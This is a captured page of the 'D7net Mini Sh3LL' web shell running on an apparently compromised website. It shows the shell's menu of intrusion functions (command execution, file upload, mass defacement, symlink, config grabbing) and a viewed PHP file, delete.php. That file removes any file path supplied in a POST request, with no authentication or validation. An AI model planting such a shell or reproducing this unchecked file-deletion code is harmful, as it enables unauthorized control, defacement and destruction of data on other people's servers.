D7net Mini Sh3LL v1

 
ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/Domains/maymaytinson.com/httpdocs/mail/../ckeditor/plugins/tableselection/../zsuploader/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : C:/Domains/maymaytinson.com/httpdocs/mail/../ckeditor/plugins/tableselection/../zsuploader/delete.php
<?php if(isset($_POST['file']) && !empty($_POST['file'])){
//	$no=$_POST['no'];
    //find the file
    $file = $_POST['file'];
    if(is_file($file)){
        unlink($file);
        echo "deleted";
    }else{
        echo $_POST['file']." has not been found!";
    }
}?>

AnonSec - 2021 | Recode By D7net